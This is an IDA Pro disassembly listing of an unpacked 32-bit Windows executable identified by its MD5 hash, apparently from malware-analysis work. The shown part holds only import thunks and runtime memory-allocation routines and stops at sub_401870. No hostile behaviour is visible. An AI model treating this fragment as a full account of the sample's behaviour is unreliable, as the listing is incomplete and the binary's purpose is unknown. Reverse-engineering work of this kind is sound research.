;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : C9D86551735195A298A7EAED3A6AA014
; File Name : u:\work\c9d86551735195a298a7eaed3a6aa014_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004541 ( 17729.)
; Section size in file : 00004541 ( 17729.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401000 proc near ; CODE XREF: sub_4033DC+39�p
; sub_4033DC+54�p
jmp ds:dword_4080E0
sub_401000 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401008 proc near ; CODE XREF: sub_402DB8+14�p
; sub_402DD4+16�p ...
jmp ds:dword_4080DC
sub_401008 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401010 proc near ; CODE XREF: sub_403230-2B6�p
; CODE:00403188�p
; DATA XREF: ...
jmp ds:dword_4080D8
sub_401010 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401018 proc near ; CODE XREF: sub_403230-31E�p
; sub_403230-2E1�p ...
jmp ds:dword_4080D4
sub_401018 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401020 proc near ; CODE XREF: sub_4033DC+3F�p
; sub_4033DC+5A�p
jmp ds:dword_4080D0
sub_401020 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401028 proc near ; CODE XREF: sub_402908+19�p
; sub_402908+55�p ...
jmp ds:dword_4080F0
sub_401028 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401030 proc near ; CODE XREF: sub_403468+C3�p
jmp ds:dword_4080CC
sub_401030 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401038 proc near ; CODE XREF: sub_4033DC+78�p
jmp ds:dword_4080EC
sub_401038 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401040 proc near ; CODE XREF: sub_403468+8B�p
jmp ds:dword_4080C8
sub_401040 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401048 proc near ; CODE XREF: sub_402A6C:loc_402AA3�p
; sub_403A78+67�p
jmp ds:dword_4080C4
sub_401048 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401050 proc near ; CODE XREF: sub_4039B0+26�p
jmp ds:dword_4080C0
sub_401050 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401058 proc near ; CODE XREF: sub_402A6C+23�p
jmp ds:dword_4080BC
sub_401058 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401060 proc near ; CODE XREF: sub_401098+A�p
jmp ds:dword_4080B8
sub_401060 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401068 proc near ; CODE XREF: sub_403A78:loc_403B20�p
; sub_403A78:loc_403B31�p
jmp ds:dword_4080B4
sub_401068 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401070 proc near ; CODE XREF: sub_402CDC+6B�p
jmp ds:dword_408100
sub_401070 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401078 proc near ; CODE XREF: sub_402CDC+22�p
jmp ds:dword_4080FC
sub_401078 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401080 proc near ; CODE XREF: sub_402CDC+55�p
jmp ds:dword_4080F8
sub_401080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401088 proc near ; CODE XREF: sub_403A78:loc_403B40�p
jmp ds:dword_4080B0
sub_401088 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401090 proc near ; CODE XREF: sub_403A78+7B�p
; sub_403A78+8C�p
jmp ds:dword_4080AC
sub_401090 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401098 proc near ; CODE XREF: sub_403A78+71�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_401060 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_4010B3
movzx ebx, [esp+48h+var_18]
loc_4010B3: ; CODE XREF: sub_401098+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_401098 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010BC proc near ; CODE XREF: sub_4010FC+15�p
; sub_401904+54�p
jmp ds:dword_4080A8
sub_4010BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010C4 proc near ; CODE XREF: sub_4019DC+41�p
; sub_4019DC+B6�p
jmp ds:dword_4080A4
sub_4010C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010CC proc near ; CODE XREF: sub_401364+2F�p
; sub_4013C8+1E�p ...
jmp ds:dword_4080A0
sub_4010CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D4 proc near ; CODE XREF: sub_401364+56�p
; sub_4013C8+69�p ...
jmp ds:dword_40809C
sub_4010D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010DC proc near ; CODE XREF: sub_401904+17�p
jmp ds:dword_408098
sub_4010DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E4 proc near ; CODE XREF: sub_401904+2A�p
; sub_4019DC+2F�p ...
jmp ds:dword_408094
sub_4010E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010EC proc near ; CODE XREF: sub_401904+C2�p
; sub_4019DC+E4�p ...
jmp ds:dword_408090
sub_4010EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F4 proc near ; CODE XREF: sub_4019DC+EE�p
jmp ds:dword_40808C
sub_4010F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4010FC proc near ; CODE XREF: sub_401188+9�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFF4h
mov ebx, offset dword_4075D0
cmp dword ptr [ebx], 0
jnz short loc_401163
push 644h
push 0
call sub_4010BC ; LocalAlloc
mov [esp+10h+var_8], eax
cmp [esp+10h+var_8], 0
jnz short loc_401128
xor eax, eax
mov [esp+10h+var_10], eax
jmp short loc_401178
; ---------------------------------------------------------------------------
loc_401128: ; CODE XREF: sub_4010FC+23�j
mov eax, [esp+10h+var_8]
mov edx, ds:dword_4075CC
mov [eax], edx
mov eax, [esp+10h+var_8]
mov ds:dword_4075CC, eax
xor eax, eax
loc_40113F: ; CODE XREF: sub_4010FC+65�j
mov edx, eax
add edx, edx
mov ecx, [esp+10h+var_8]
lea edx, [ecx+edx*8+4]
mov [esp+10h+var_C], edx
mov edx, [esp+10h+var_C]
mov ecx, [ebx]
mov [edx], ecx
mov edx, [esp+10h+var_C]
mov [ebx], edx
inc eax
cmp eax, 64h
jnz short loc_40113F
loc_401163: ; CODE XREF: sub_4010FC+C�j
mov eax, [ebx]
mov [esp+10h+var_C], eax
mov eax, [esp+10h+var_C]
mov eax, [eax]
mov [ebx], eax
mov eax, [esp+10h+var_C]
mov [esp+10h+var_10], eax
loc_401178: ; CODE XREF: sub_4010FC+2A�j
mov eax, [esp+10h+var_10]
add esp, 0Ch
pop ebx
retn
sub_4010FC endp
; =============== S U B R O U T I N E =======================================
sub_401180 proc near ; CODE XREF: sub_401904+34�p
; sub_401904+3E�p ...
mov [eax], eax
mov [eax+4], eax
retn
sub_401180 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401188 proc near ; CODE XREF: sub_401218+71�p
; sub_4012A0+96�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
call sub_4010FC
mov [esp+10h+var_C], eax
cmp [esp+10h+var_C], 0
jnz short loc_4011A5
xor eax, eax
jmp short loc_4011DF
; ---------------------------------------------------------------------------
loc_4011A5: ; CODE XREF: sub_401188+17�j
mov eax, [esi]
mov edx, [esp+10h+var_C]
mov [edx+8], eax
mov eax, [esi+4]
mov edx, [esp+10h+var_C]
mov [edx+0Ch], eax
mov eax, [ebx]
mov [esp+10h+var_10], eax
mov eax, [esp+10h+var_C]
mov edx, [esp+10h+var_10]
mov [eax], edx
mov eax, [esp+10h+var_C]
mov [eax+4], ebx
mov eax, [esp+10h+var_10]
mov edx, [esp+10h+var_C]
mov [eax+4], edx
mov eax, [esp+10h+var_C]
mov [ebx], eax
mov al, 1
loc_4011DF: ; CODE XREF: sub_401188+1B�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_401188 endp
; =============== S U B R O U T I N E =======================================
sub_4011E4 proc near ; CODE XREF: sub_401218+37�p
; sub_401218+56�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
add esp, 0FFFFFFF8h
mov edx, [eax+4]
mov [esp+8+var_8], edx
mov edx, [eax]
mov [esp+8+var_4], edx
mov edx, [esp+8+var_8]
mov ecx, [esp+8+var_4]
mov [edx], ecx
mov edx, [esp+8+var_4]
mov ecx, [esp+8+var_8]
mov [edx+4], ecx
mov edx, ds:dword_4075D0
mov [eax], edx
mov ds:dword_4075D0, eax
pop ecx
pop edx
retn
sub_4011E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401218 proc near ; CODE XREF: sub_401684+80�p
; sub_40172C+78�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebx, ecx
mov esi, eax
mov edi, esp
mov eax, [esi]
mov [edi], eax
mov eax, [edx]
mov [ebx], eax
mov eax, [edx+4]
mov [ebx+4], eax
loc_401233: ; CODE XREF: sub_401218+6B�j
mov eax, [edi]
mov eax, [eax]
mov [esp+18h+var_14], eax
mov edx, [edi]
mov edx, [edx+8]
mov ecx, edx
mov ebp, [edi]
add ecx, [ebp+0Ch]
mov eax, [ebx]
cmp ecx, eax
jnz short loc_401265
mov eax, [edi]
call sub_4011E4
mov eax, [edi]
mov eax, [eax+8]
mov [ebx], eax
mov eax, [edi]
mov eax, [eax+0Ch]
add [ebx+4], eax
jmp short loc_40127B
; ---------------------------------------------------------------------------
loc_401265: ; CODE XREF: sub_401218+33�j
add eax, [ebx+4]
cmp edx, eax
jnz short loc_40127B
mov eax, [edi]
call sub_4011E4
mov eax, [edi]
mov eax, [eax+0Ch]
add [ebx+4], eax
loc_40127B: ; CODE XREF: sub_401218+4B�j
; sub_401218+52�j
mov eax, [esp+18h+var_14]
mov [edi], eax
cmp esi, [edi]
jnz short loc_401233
mov edx, ebx
mov eax, esi
call sub_401188
test al, al
jnz short loc_401296
xor eax, eax
mov [ebx], eax
loc_401296: ; CODE XREF: sub_401218+78�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401218 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4012A0 proc near ; CODE XREF: sub_401870+82�p
; sub_401CF4+AB�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF0h
mov [esp+20h+var_20], eax
mov esi, esp
mov eax, [esi]
mov [esp+20h+var_14], eax
loc_4012B2: ; CODE XREF: sub_4012A0+B3�j
mov ecx, [edx]
mov eax, [esi]
mov eax, [eax+8]
cmp ecx, eax
jb loc_401347
mov ebx, eax
mov edi, [esi]
add ebx, [edi+0Ch]
mov edi, ecx
add edi, [edx+4]
cmp ebx, edi
jb short loc_401347
cmp ecx, eax
jnz short loc_4012F6
mov eax, [edx+4]
mov ecx, [esi]
add [ecx+8], eax
mov eax, [edx+4]
mov edx, [esi]
sub [edx+0Ch], eax
mov eax, [esi]
cmp dword ptr [eax+0Ch], 0
jnz short loc_401343
mov eax, [esi]
call sub_4011E4
jmp short loc_401343
; ---------------------------------------------------------------------------
loc_4012F6: ; CODE XREF: sub_4012A0+33�j
mov ebx, eax
mov edi, [esi]
add ebx, [edi+0Ch]
mov edi, ecx
add edi, [edx+4]
cmp ebx, edi
jnz short loc_401310
mov eax, [edx+4]
mov edx, [esi]
sub [edx+0Ch], eax
jmp short loc_401343
; ---------------------------------------------------------------------------
loc_401310: ; CODE XREF: sub_4012A0+64�j
mov ebx, [edx]
add ebx, [edx+4]
mov [esp+20h+var_1C], ebx
mov edi, [esi]
mov edi, [edi+8]
mov ebp, [esi]
add edi, [ebp+0Ch]
sub edi, ebx
mov [esp+20h+var_18], edi
sub ecx, eax
mov eax, [esi]
mov [eax+0Ch], ecx
lea edx, [esp+20h+var_1C]
mov eax, [esi]
call sub_401188
test al, al
jnz short loc_401343
xor eax, eax
jmp short loc_40135B
; ---------------------------------------------------------------------------
loc_401343: ; CODE XREF: sub_4012A0+4B�j
; sub_4012A0+54�j ...
mov al, 1
jmp short loc_40135B
; ---------------------------------------------------------------------------
loc_401347: ; CODE XREF: sub_4012A0+1B�j
; sub_4012A0+2F�j
mov eax, [esi]
mov eax, [eax]
mov [esi], eax
mov eax, [esi]
cmp eax, [esp+20h+var_14]
jnz loc_4012B2
xor eax, eax
loc_40135B: ; CODE XREF: sub_4012A0+A1�j
; sub_4012A0+A5�j
add esp, 10h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4012A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401364 proc near ; CODE XREF: sub_401684+6E�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
cmp esi, 100000h
jge short loc_40137A
mov esi, 100000h
jmp short loc_401386
; ---------------------------------------------------------------------------
loc_40137A: ; CODE XREF: sub_401364+D�j
add esi, 0FFFFh
and esi, 0FFFF0000h
loc_401386: ; CODE XREF: sub_401364+14�j
mov [ebx+4], esi
push 1
push 2000h
push esi
push 0
call sub_4010CC ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jz short loc_4013C3
mov edx, ebx
mov eax, offset off_4075D4
call sub_401188
test al, al
jnz short loc_4013C3
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010D4 ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_4013C3: ; CODE XREF: sub_401364+3A�j
; sub_401364+4A�j
pop edi
pop esi
pop ebx
retn
sub_401364 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4013C8 proc near ; CODE XREF: sub_40172C+62�p
; sub_40172C+A9�p
push ebx
push esi
push edi
push ebp
mov ebx, ecx
mov esi, edx
mov ebp, eax
mov dword ptr [ebx+4], 100000h
push 4
push 2000h
push 100000h
push ebp
call sub_4010CC ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jnz short loc_401412
add esi, 0FFFFh
and esi, 0FFFF0000h
mov [ebx+4], esi
push 4
push 2000h
push esi
push ebp
call sub_4010CC ; VirtualAlloc
mov [ebx], eax
loc_401412: ; CODE XREF: sub_4013C8+29�j
cmp dword ptr [ebx], 0
jz short loc_40143A
mov edx, ebx
mov eax, offset off_4075D4
call sub_401188
test al, al
jnz short loc_40143A
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010D4 ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_40143A: ; CODE XREF: sub_4013C8+4D�j
; sub_4013C8+5D�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4013C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401440 proc near ; CODE XREF: sub_401684+95�p
; sub_40172C+90�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov edi, ecx
mov esi, esp
mov [esp+28h+var_20], 0FFFFFFFFh
xor ecx, ecx
mov [esp+28h+var_1C], ecx
mov [esp+28h+var_18], eax
add edx, [esp+28h+var_18]
mov [esp+28h+var_14], edx
mov eax, ds:off_4075D4
mov [esi], eax
jmp short loc_4014D9
; ---------------------------------------------------------------------------
loc_40146E: ; CODE XREF: sub_401440+A0�j
mov eax, [esi]
mov eax, [eax]
mov [esp+28h+var_24], eax
mov eax, [esi]
mov ebx, [eax+8]
cmp ebx, [esp+28h+var_18]
jb short loc_4014D3
mov eax, ebx
mov edx, [esi]
add eax, [edx+0Ch]
cmp eax, [esp+28h+var_14]
ja short loc_4014D3
cmp ebx, [esp+28h+var_20]
jnb short loc_401498
mov [esp+28h+var_20], ebx
loc_401498: ; CODE XREF: sub_401440+52�j
mov eax, [esi]
mov ebp, [eax+8]
mov eax, [esi]
add ebp, [eax+0Ch]
cmp ebp, [esp+28h+var_1C]
jbe short loc_4014AC
mov [esp+28h+var_1C], ebp
loc_4014AC: ; CODE XREF: sub_401440+66�j
push 8000h
push 0
mov eax, [esi]
mov eax, [eax+8]
push eax
call sub_4010D4 ; VirtualFree
test eax, eax
jnz short loc_4014CC
mov ds:dword_4075B0, 1
loc_4014CC: ; CODE XREF: sub_401440+80�j
mov eax, [esi]
call sub_4011E4
loc_4014D3: ; CODE XREF: sub_401440+3F�j
; sub_401440+4C�j
mov eax, [esp+28h+var_24]
mov [esi], eax
loc_4014D9: ; CODE XREF: sub_401440+2C�j
mov eax, offset off_4075D4
cmp eax, [esi]
jnz short loc_40146E
xor eax, eax
mov [edi], eax
cmp [esp+28h+var_1C], 0
jz short loc_4014FE
mov eax, [esp+28h+var_20]
mov [edi], eax
mov eax, [esp+28h+var_1C]
sub eax, [esp+28h+var_20]
mov [edi+4], eax
loc_4014FE: ; CODE XREF: sub_401440+AB�j
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401440 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401508 proc near ; CODE XREF: sub_401684+35�p
; sub_40172C+100�p
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov ebx, ecx
mov [esp+28h+var_28], edx
lea esi, [esp+28h+var_20]
lea edi, [esp+28h+var_24]
lea ebp, [esp+28h+var_1C]
mov edx, eax
mov ecx, edx
and ecx, 0FFFFF000h
mov [esp+28h+var_18], ecx
add edx, [esp+28h+var_28]
add edx, 0FFFh
and edx, 0FFFFF000h
mov [esp+28h+var_14], edx
mov eax, [esp+28h+var_18]
mov [ebx], eax
mov eax, [esp+28h+var_14]
sub eax, [esp+28h+var_18]
mov [ebx+4], eax
mov eax, ds:off_4075D4
mov [edi], eax
jmp short loc_4015B6
; ---------------------------------------------------------------------------
loc_40155B: ; CODE XREF: sub_401508+B5�j
mov eax, [edi]
mov eax, [eax+8]
mov [esi], eax
mov eax, [edi]
mov eax, [eax+0Ch]
add eax, [esi]
mov [ebp+0], eax
mov eax, [esi]
cmp eax, [esp+28h+var_18]
jnb short loc_40157A
mov eax, [esp+28h+var_18]
mov [esi], eax
loc_40157A: ; CODE XREF: sub_401508+6A�j
mov eax, [ebp+0]
cmp eax, [esp+28h+var_14]
jbe short loc_40158A
mov eax, [esp+28h+var_14]
mov [ebp+0], eax
loc_40158A: ; CODE XREF: sub_401508+79�j
mov eax, [esi]
cmp eax, [ebp+0]
jnb short loc_4015B0
push 4
push 1000h
mov eax, [ebp+0]
sub eax, [esi]
push eax
mov eax, [esi]
push eax
call sub_4010CC ; VirtualAlloc
test eax, eax
jnz short loc_4015B0
xor eax, eax
mov [ebx], eax
jmp short loc_4015BF
; ---------------------------------------------------------------------------
loc_4015B0: ; CODE XREF: sub_401508+87�j
; sub_401508+A0�j
mov eax, [edi]
mov eax, [eax]
mov [edi], eax
loc_4015B6: ; CODE XREF: sub_401508+51�j
mov eax, offset off_4075D4
cmp eax, [edi]
jnz short loc_40155B
loc_4015BF: ; CODE XREF: sub_401508+A6�j
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401508 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4015C8 proc near ; CODE XREF: sub_401870+36�p
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov [esp+28h+var_28], edx
lea esi, [esp+28h+var_20]
lea edi, [esp+28h+var_24]
lea ebx, [esp+28h+var_1C]
mov edx, eax
mov ebp, edx
add ebp, 0FFFh
and ebp, 0FFFFF000h
mov [esp+28h+var_18], ebp
add edx, [esp+28h+var_28]
and edx, 0FFFFF000h
mov [esp+28h+var_14], edx
mov eax, [esp+28h+var_18]
mov [ecx], eax
mov eax, [esp+28h+var_14]
sub eax, [esp+28h+var_18]
mov [ecx+4], eax
mov eax, ds:off_4075D4
mov [edi], eax
jmp short loc_401671
; ---------------------------------------------------------------------------
loc_401619: ; CODE XREF: sub_4015C8+B0�j
mov eax, [edi]
mov eax, [eax+8]
mov [esi], eax
mov eax, [edi]
mov eax, [eax+0Ch]
add eax, [esi]
mov [ebx], eax
mov eax, [esi]
cmp eax, [esp+28h+var_18]
jnb short loc_401637
mov eax, [esp+28h+var_18]
mov [esi], eax
loc_401637: ; CODE XREF: sub_4015C8+67�j
mov eax, [ebx]
cmp eax, [esp+28h+var_14]
jbe short loc_401645
mov eax, [esp+28h+var_14]
mov [ebx], eax
loc_401645: ; CODE XREF: sub_4015C8+75�j
mov eax, [esi]
cmp eax, [ebx]
jnb short loc_40166B
push 4000h
mov eax, [ebx]
sub eax, [esi]
push eax
mov eax, [esi]
push eax
call sub_4010D4 ; VirtualFree
test eax, eax
jnz short loc_40166B
mov ds:dword_4075B0, 2
loc_40166B: ; CODE XREF: sub_4015C8+81�j
; sub_4015C8+97�j
mov eax, [edi]
mov eax, [eax]
mov [edi], eax
loc_401671: ; CODE XREF: sub_4015C8+4F�j
mov eax, offset off_4075D4
cmp eax, [edi]
jnz short loc_401619
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4015C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401684 proc near ; CODE XREF: sub_401F80+B�p
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov ebx, edx
mov esi, eax
mov edi, esp
mov ebp, offset off_4075E4
add esi, 3FFFh
and esi, 0FFFFC000h
loc_4016A2: ; CODE XREF: sub_401684+8A�j
mov eax, [ebp+0]
mov [edi], eax
jmp short loc_4016EA
; ---------------------------------------------------------------------------
loc_4016A9: ; CODE XREF: sub_401684+68�j
mov eax, [edi]
cmp esi, [eax+0Ch]
jg short loc_4016E4
mov ecx, ebx
mov eax, [edi]
mov eax, [eax+8]
mov edx, esi
call sub_401508
cmp dword ptr [ebx], 0
jz short loc_401722
mov eax, [ebx+4]
mov edx, [edi]
add [edx+8], eax
mov eax, [ebx+4]
mov edx, [edi]
sub [edx+0Ch], eax
mov eax, [edi]
cmp dword ptr [eax+0Ch], 0
jnz short loc_401722
mov eax, [edi]
call sub_4011E4
jmp short loc_401722
; ---------------------------------------------------------------------------
loc_4016E4: ; CODE XREF: sub_401684+2A�j
mov eax, [edi]
mov eax, [eax]
mov [edi], eax
loc_4016EA: ; CODE XREF: sub_401684+23�j
cmp ebp, [edi]
jnz short loc_4016A9
mov edx, ebx
mov eax, esi
call sub_401364
cmp dword ptr [ebx], 0
jz short loc_401722
lea ecx, [esp+1Ch+var_18]
mov edx, ebx
mov eax, ebp
call sub_401218
cmp [esp+1Ch+var_18], 0
jnz short loc_4016A2
lea ecx, [esp+1Ch+var_18]
mov edx, [ebx+4]
mov eax, [ebx]
call sub_401440
xor eax, eax
mov [ebx], eax
loc_401722: ; CODE XREF: sub_401684+3D�j
; sub_401684+55�j ...
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401684 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40172C proc near ; CODE XREF: sub_401FAC+10�p
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov [esp+28h+var_28], ecx
mov edi, edx
mov ebx, eax
lea esi, [esp+28h+var_24]
mov ebp, offset off_4075E4
add edi, 3FFFh
and edi, 0FFFFC000h
loc_40174F: ; CODE XREF: sub_40172C+82�j
; sub_40172C+C9�j
mov eax, [ebp+0]
mov [esi], eax
jmp short loc_40175C
; ---------------------------------------------------------------------------
loc_401756: ; CODE XREF: sub_40172C+39�j
mov eax, [esi]
mov eax, [eax]
mov [esi], eax
loc_40175C: ; CODE XREF: sub_40172C+28�j
cmp ebp, [esi]
jz short loc_401767
mov eax, [esi]
cmp ebx, [eax+8]
jnz short loc_401756
loc_401767: ; CODE XREF: sub_40172C+32�j
mov eax, [esi]
cmp ebx, [eax+8]
jnz short loc_4017CD
mov eax, [esi]
cmp edi, [eax+0Ch]
jle loc_401815
mov eax, [esi]
mov edx, edi
sub edx, [eax+0Ch]
mov eax, [esi]
mov eax, [eax+8]
mov ecx, [esi]
add eax, [ecx+0Ch]
lea ecx, [esp+28h+var_20]
call sub_4013C8
cmp [esp+28h+var_20], 0
jz short loc_4017CD
lea ecx, [esp+28h+var_18]
lea edx, [esp+28h+var_20]
mov eax, ebp
call sub_401218
cmp [esp+28h+var_18], 0
jnz short loc_40174F
lea ecx, [esp+28h+var_18]
mov edx, [esp+28h+var_1C]
mov eax, [esp+28h+var_20]
call sub_401440
mov eax, [esp+28h+var_28]
xor edx, edx
mov [eax], edx
jmp loc_401867
; ---------------------------------------------------------------------------
loc_4017CD: ; CODE XREF: sub_40172C+40�j
; sub_40172C+6C�j
lea ecx, [esp+28h+var_20]
mov edx, edi
mov eax, ebx
call sub_4013C8
cmp [esp+28h+var_20], 0
jz short loc_401815
lea ecx, [esp+28h+var_18]
lea edx, [esp+28h+var_20]
mov eax, ebp
call sub_401218
cmp [esp+28h+var_18], 0
jnz loc_40174F
lea ecx, [esp+28h+var_18]
mov edx, [esp+28h+var_1C]
mov eax, [esp+28h+var_20]
call sub_401440
mov eax, [esp+28h+var_28]
xor edx, edx
mov [eax], edx
jmp short loc_401867
; ---------------------------------------------------------------------------
loc_401815: ; CODE XREF: sub_40172C+47�j
; sub_40172C+B3�j
mov eax, [esi]
mov ebp, [eax+8]
cmp ebx, ebp
jnz short loc_401860
mov eax, [esi]
cmp edi, [eax+0Ch]
jg short loc_401860
mov ecx, [esp+28h+var_28]
mov eax, ebp
mov edx, edi
call sub_401508
mov eax, [esp+28h+var_28]
cmp dword ptr [eax], 0
jz short loc_401867
mov eax, [esp+28h+var_28]
mov eax, [eax+4]
mov edx, [esi]
add [edx+8], eax
mov eax, [esp+28h+var_28]
mov eax, [eax+4]
mov edx, [esi]
sub [edx+0Ch], eax
mov eax, [esi]
cmp dword ptr [eax+0Ch], 0
jnz short loc_401867
mov eax, [esi]
call sub_4011E4
jmp short loc_401867
; ---------------------------------------------------------------------------
loc_401860: ; CODE XREF: sub_40172C+F0�j
; sub_40172C+F7�j
mov eax, [esp+28h+var_28]
xor edx, edx
mov [eax], edx
loc_401867: ; CODE XREF: sub_40172C+9C�j
; sub_40172C+E7�j ...
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40172C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401870 proc near ; CODE XREF: sub_401CF4+5B�p
